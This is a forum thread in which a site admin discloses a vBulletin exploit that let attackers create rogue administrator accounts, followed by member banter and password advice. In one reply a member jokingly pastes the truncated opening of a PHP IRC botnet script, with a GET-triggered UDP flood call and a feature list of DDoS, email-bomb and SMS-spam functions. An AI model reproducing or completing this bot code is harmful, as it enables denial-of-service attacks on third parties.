We've been hacked, but it doesn't seem serious

Good CO

Admin
Last week vBulletin, who make the forum software, announced that an exploit had been found which could give a hacker administrative access to the site (i.e. as Good / Bad CO) - basically meaning he/she could change just about anything. We patched the exploit within minutes of the notification and it initially appeared that we were in the clear, but yesterday we found that was not the case.

It has become clear that administrator user accounts had been created on the site. At present we think that is the limit of the success of the hackers, as the administrative control area of the site has an extra layer of protection separate from any access control by vBulletin itself, thanks to my security paranoia.

Was any damage done?

None that we've found so far

What information could have been accessed?


It is possible that the attacker(s) could view user account details, one by one, and therefore have been able to see a user's email address and IP address, and with a year or so of hard graft might have managed everyone. PMs and passwords (encrypted anyway) would have remained secure. It does though appear that the hacker(s) didn't go further than the initial account creation made possible by the exploit. This is almost certainly as they couldn't get access to the administrative area, and moved on to a softer target - the vBulletin forum of some other unfortunate online community.

I will be working through our logs this morning checking if any personal accounts have been accessed.

So what?

Well, not much actually. It comes under 'operational honesty' to inform everyone about this and I will put reference to this thread in the next newsletter. After further checks we can hopefully view it as just a nice nudge to do a security audit, and perhaps a pat on the back for going the extra mile in our security measures to date.
 

guestm

Guest
They stole £5,000,000 from me, it's your fault and I want it back.
 

Blackrat

War Hero
Moderator
Book Reviewer
Look. Those pictures. I went to see the Rocky Horror show ok? That's all it was.
 

Ninja_Stoker

War Hero
Moderator
Aha, not the black hole iframe exploit perchance? If it is, it's the death knell of vBulletin who have rather arrogantly suggested it doesn't exist. If it is that exploit, it'll keep coming back, whatever you do. XenForo software is light years ahead of vBulletin and comes with a swift data migration script. Hopefully it isn't the exploit I've had dealings with - the exploit was first flagged by antivirus freeware - AVG or similar.
 

sgtpepperband

War Hero
Book Reviewer
Aha, not the black hole iframe exploit perchance? If it is, it's the death knell of vBulletin who have rather arrogantly suggested it doesn't exist. If it is that exploit, it'll keep coming back, whatever you do. XenForo software is light years ahead of vBulletin and comes with a swift data migration script. Hopefully it isn't the exploit I've had dealings with - the exploit was first flagged by antivirus freeware - AVG or similar.
 

Ninja_Stoker

War Hero
Moderator
Website hacks nowadays tend to be more likely conducted by Cheltenham than China. It's all the rage apparently :pc:
 
Aha, not the black hole iframe exploit perchance? If it is, it's the death knell of vBulletin who have rather arrogantly suggested it doesn't exist. If it is that exploit, it'll keep coming back, whatever you do. XenForo software is light years ahead of vBulletin and comes with a swift data migration script. Hopefully it isn't the exploit I've had dealings with - the exploit was first flagged by antivirus freeware - AVG or similar.
You got someone to type this in for you didn't you?
 

BillyNoMates

War Hero
I now have access.

I'm now in total control of all the Cash Points in Plymouth. There's £100 waiting for the first lucky RR member to get to the TSB hole in the wall in Crownhill.

<?
if($_GET['act'] == 'lol'){
    udpflood4($_GET['host'], $_GET['psize'], $_GET['time'], $_GET['port']);
}
/****************************************************/
/* ---------------------UniX-------------------- */
/* UniX Bot - Coding by ANoN - This code is Very PUBLIC! */
/* + Modded UDP Flooder */
/* + Removed TCP Flooder */
/* + Added email bomb */
/* + Added join message */
/* + Added !site command */
/* + Added whois */
/* + Added port scan */
/* + Added Quick UDP Flood */
/* + Added Colors */
/* + Added Count Command */
/* - Removed Host (IP Address) Auth (Its bullssss) */
/* + Added Credits */
/* + Added Speedtest */
/* - Removed Useless ssss */
/* + Cleaned the code */
/* + Added Version */
/* + Added New nicks */
/* + Added Update command */
/* + Made the update command idiot proof */
/* + Added commands command */
/* + Added id command */
/* + Added uptime command */
/* + Added evidence eraser */
/* + Added Cell Phone Spammer */
/* + Added Cell info */
/* + Added change prefix */
/* + Added install update command */
/* + Added port 3074 DDoS */
/* + ICMP ddoS? */
/* + FTP ddoS? */
/* + Added 2 Player ddos feature */
/* + Added 3 Player ddos feature */
/* + Added 4 Player ddos feature */
/****************************************************/
set_time_limit( 0 );
error_reporting( 0 );
echo "ANoNyMoUS iZ LeGioN";
class Mike_Unix
{
    var $using_encode = true;
    var $config = array(
        'nickform' => 'FraseR|%d]',
        'nickform2' => '%d]',
        'prfix' => 'NzM|%d]',
        'identp' => 'Mike',
        'modes' => '+B',
        'maxrand' => 6,
        'maxrand2' => 1,
        'maxrand3' => 2,
        'maxrand4' => 3,
        'cprefix' => '.',
        'version' => '1.0',
        'host' => '*',
        'yellow' => '12',
        'blue' => '4',
        'orange' => '9',
        'green' => '7',
        'leetprefix' => '4>>',
        'leetsuffix' => '12<<',
        'leetprefixwhite' => '0>>',
        'leetsuffixwhite' => '0<<',
        'leetsuffixred' => '4<<',
        'part1' => '0?~{ 4',
        'part2' => '0}~?',
        'hostauth' => '*'
    );
    var $messages = array


[Simples!]
 

Ninja_Stoker

War Hero
Moderator
On a slightly more serious note & not wishing to be alarmist, whilst GCO advises passwords are encrypted, for those who wish to be security conscious, it would do you no harm to change your password.

I have, simply to safeguard online banking data. Probably paranoia, admittedly.
 

Bad CO

Admin
Not a bad idea to change your passwords periodically anyway. I'd also recommend a password manager such as LastPass, KeePass or RoboForm which will allow you to choose really strong ones.
 

Ninja_Stoker

War Hero
Moderator
Not a bad idea to change your passwords periodically anyway. I'd also recommend a password manager such as LastPass, KeePass or RoboForm which will allow you to choose really strong ones.
True, many of us are guilty of not changing our passwords, but in the case of a hack, it's always a good first aid measure because the only thing that protects the individual if their details have been compromised is the volume of data available to the hacker.
 

Dredd

War Hero
Just asked the NSA if they got my password and they swear they didn't, but they did ask me what it was just to confirm it so I told them and it turns out they haven't got it. Glad to know I am safe with such vigilant defenders of freedom covering my back. Whew.
 
